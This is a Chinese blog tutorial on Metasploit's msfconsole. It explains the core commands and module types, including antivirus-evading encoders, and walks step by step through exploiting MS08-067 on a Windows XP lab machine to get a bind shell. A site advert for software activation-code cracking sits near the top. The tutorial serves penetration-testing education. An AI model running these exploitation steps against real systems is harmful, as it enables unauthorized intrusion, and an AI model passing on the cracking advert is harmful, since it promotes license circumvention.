msfconsole 控制台使用和操作[通俗易懂]

msfconsole 控制台使用和操作[通俗易懂]Msfconsole提供了一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在msfconsole里面使用。在启动MSF终端之后,可以首先输入help命令列出MSF终端所支持的命令列表,包括核心命令集和后端数据库命令集。对于…

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺

Msfconsole提供了一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在msfconsole里面使用。 在启动MSF终端之后,可以首先输入help命令列出MSF终端所支持的命令列表,包括核心命令集和后端数据库命令集。对于其中的大部分命令,你可以输入help[COMMAND],进一步查看该命令的使用帮助信息。

1.输入 msfconsole 打开

msfconsole 控制台使用和操作[通俗易懂]
2.然后输入 search ms08-067查找漏洞
打开远程桌面协议

msfconsole 控制台使用和操作[通俗易懂]

use参数
这个是使用参数。如你要使用到某个利用模块,payload等,那么就要使用到use参数
使用漏洞 use 你选择的利用模块

msfconsole 控制台使用和操作[通俗易懂]

Show参数
这个命令用的很多。请一定认真看。如果单纯的输入show,那么就会显示出所有的payload,利用模块,post模块,插件等等。但是一般我们都不这么使用。如果要显示利用模块,那么就输入show exploits。如果要显示payload,那么就输入show payloads。
展示可用载荷show payloads

查看还需要设置的选项 show options,为YES且空的就是还需要我们设置的。 可以看到下图中RHOST参数还未设置内容 

msfconsole 控制台使用和操作[通俗易懂]
Set参数
这个主要是对payload或者其他模块进行设置。比如设置攻击目标的IP就是set RHOST 192.168.0.2

然后输入 exploit 执行攻击,输入exit退出

msfconsole 控制台使用和操作[通俗易懂]

 

 

  • MSF的六个模块:exploit,encoder,payload,aux,post,nops
    • exploit——渗透攻击模块
        测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的有内存溢出,网站程序漏洞利用,配置错误exploit。
        exploits总的来说共分为两类溢出(exploit)攻击方法,即主动溢出和被动溢出。主动溢出是针对目标主机的漏洞主动的进行攻击以获得控制权限,被动溢出是针
        对目标主机被动的监听然后获得相应的操作。
        Exploit共分为13种,分别是:ais、bsdi、dialup、freebsd、hpux、irix、linux、multi、netware、osx、solaris、unix、windows。其中windows下面的最多。
  • encoder——编码器模块,对指令重新进行编码,用以实现反检测功能、指令顺利执行等
在metasploit中内置了27种encode模块,可对metasploit中的exploit进行编码(encode),以避免反病毒软件检测。如:
generic/none normal The "none" Encoder
mipsbe/longxor normal XOR Encoder
mipsle/longxor normal XOR Encoder
php/base64 great PHP Base64 encoder
ppc/longxor normal PPC LongXOR Encoder
  • payload——攻击载荷模块, 由一些可动态运行在远程主机上的代码组成
我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器与测试者之间建立一
个反响连接,bind shell 绑定一个执行命令的通道至测试者的机器。payload 也可以是只
能在目标机器上执行有限命令的程序。
  • aux——辅助模块,用以实现辅助攻击,如端口扫描工具、口令猜测激活成功教程、敏感信息嗅探等
  • post——后渗透攻击模块
在渗透攻击取得目标系统远程控制权之后,在受控系统中进行各式各样的后渗透攻击动作,比如获取敏感信息、进一步拓展、实施跳板攻击等。
  • nops——空指令模块,用以产生缓冲区填充的非操作性指令
  • 使用msfconsole,了解msfcli,msfgui

Metasploit目前提供了三种用户使用接口,一个是GUI模式,另一个是console终端模式,第三种是CLI(命令行)模式。msfcli 虽然和msfconsole一样同为命令行界面,

但是他不提供交互的命令行模式,直接通过命令行执行输出结果,直接调用辅助模块和攻击模块对目标进行渗透攻击,更为高效便捷。msfgui 图形化界面工具可

轻松地单击鼠标,输入目标 IP 地址,就可以使用 Metasploit 强大功能渗透进入目标系统 。 

  1. msfconsole模式最常用,启动方式:

输入msfconsole

运行此命令后将进入msf 命令提示符: 

msf>

msfconsole 控制台使用和操作[通俗易懂]

2、获取命令的帮助信息:help

例子:help connect

msfconsole 控制台使用和操作[通俗易懂]

3、Armitage :MSF 的一个图形接口

运行方式:armitage

msfconsole 控制台使用和操作[通俗易懂]

  • 常用exploit,payload设置参数

  1. show exploit——显示Metasploit中所有渗透攻击模块
  2. show playload——查看所有活动状态的攻击载荷
  • 攻击靶机并获取shell

       被攻击者IP地址:192.168.120.131,操作系统Windows XP sp3 

       攻击者IP地址:192.168.120.130

1.//查找ms08_067漏洞

msf > search ms08_067

     msfconsole 控制台使用和操作[通俗易懂]

2、//使用MS08_067漏洞
 use exploit/windows/smb/ms08_067_netapi

3、//设置远程地址,正向连接
set RHOST 192.168.120.131

4、//设置ShellCode
set payload windows/shell_bind_tcp

5、//显示配置的选项
 show options

msfconsole 控制台使用和操作[通俗易懂]

6、//expliot攻击
msfconsole 控制台使用和操作[通俗易懂]

    成功返回Shell

msfconsole 控制台使用和操作[通俗易懂]

源:

deb http://mirrors.ustc.edu.cn/kali sana main non-free contrib

 

deb http://mirrors.ustc.edu.cn/kali-security/ sana/updates main contrib non-free

 

deb-src http://mirrors.ustc.edu.cn/kali-security/ sana/updates main contrib non-free
#阿里云kali源

 

deb http://mirrors.aliyun.com/kali sana main non-free contrib

 

deb-src http://mirrors.aliyun.com/kali-security/ sana/updates main contrib non-free
deb http://http.kali.org/kali kali-rolling main non-free contrib

deb cdrom:[Debian GNU/Linux 2.0 _Sana_ – Official Snapshot i386 LIVE/INSTALL Binary 20150811-09:06]/ sana contrib main non-free
deb cdrom:[Debian GNU/Linux 2.0 _Sana_ – Official Snapshot i386 LIVE/INSTALL Binary 20150811-09:06]/ sana contrib main non-free
deb http://http.kali.org/kali sana main non-free contrib
deb-src http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security/ sana/updates main contrib non-free
deb-src http://security.kali.org/kali-security/ sana/updates main contrib non-free
deb http://http.kali.org/kali kali main non-free contrib
deb-src http://http.kali.org/kali kali main non-free contrib
deb http://security.kali.org/kali-security kali/updates main contrib non-free
deb http://mirrors.aliyun.com/kali kali main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali main non-free contrib

 

deb http://mirrors.aliyun.com/kali kali main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali main non-free contrib
deb http://mirrors.aliyun.com/kali-security kali/updates main contrib non-free

 

deb http://mirrors.aliyun.com/kali-security kali/updates main contrib non-free

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/196418.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长


相关推荐

  • 项目开发实战_go项目实战

    项目开发实战_go项目实战TodoMVC是一个非常经典的案例,功能非常丰富,并且针对多种不同技术分别都开发了此项目,比如React、AngularJS、JQuery等等,本文使用Vue开发。

    2022年9月12日
    0
  • 智能优化算法:灰狼优化算法-附代码

    智能优化算法:灰狼优化算法-附代码智能算法:灰狼优化算法-附代码摘要:受灰狼群体捕食行为的启发,Mirjalili等[1]于2014年提出了一种新型群体智能优化算法:灰狼优化算法。GWO通过模拟灰狼群体捕食行为,基于狼群群体协作的机制来达到优化的目的。GWO算法具有结构简单、需要调节的参数少,容易实现等特点,其中存在能够自适应调整的收敛因子以及信息反馈机制,能够在局部寻优与全局搜索之间实现平衡,因此在对问题的求解精度和收敛速度方面都有良好的性能。1.算法原理灰狼属于犬科动物,被认为是顶级的掠食者,它们处于生物

    2022年5月24日
    29
  • UFT12.02 LICENSE延期

    UFT12.02 LICENSE延期1.以win7系统为例,安装完成后,修改图片目录下红色目录,仅第一次需修改2.删除红色目录,每次延期都需删除或修改此目录3.运行instdemo.exe,无报错,应该就延期成功了

    2022年5月28日
    50
  • js简单实现切换图片上一张下一张功能是什么_js中图片切换效果怎么实现

    js简单实现切换图片上一张下一张功能是什么_js中图片切换效果怎么实现<!DOCTYPEhtml><html><headlang=”en”><metacharset=”UTF-8″><title>照片点击切换</title></head><style>*{margin:0;padding:0;}#picBox{margin:100pxauto;.

    2025年7月23日
    1
  • DM368开发 — 毕设之硬件[通俗易懂]

    DM368开发 — 毕设之硬件[通俗易懂]这部分将参看相关的毕业论文设计来讲一下DM368的硬件部分。参看:相关论文基于DM368的高清视频监控系统设计与实现–文波一、系统硬件电路详细设计3.1TMS320DM368硬件平台简介TMS320DM368是德州仪器公司(TI)于2010年4月推出的新一代基于Davinci技术的高清视频处理器,内部集成了一颗ARM内核和两个视频图像协处理器,同时内部还集成了一个视频

    2022年8月13日
    1
  • 矩阵求逆的_matlab计算矩阵的逆矩阵

    矩阵求逆的_matlab计算矩阵的逆矩阵首先输入矩阵,例如:octave:1&gt;a=[3,4;2,16]a=  3  4  2 16然后,利用pinv函数求逆octave:2&gt;pinv(a)ans=  0.400000 -0.100000 -0.050000 0.075000octave:3&gt;pinv(a)*aans=  1.00000 -0.00000  0.00000 …

    2022年8月21日
    6

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号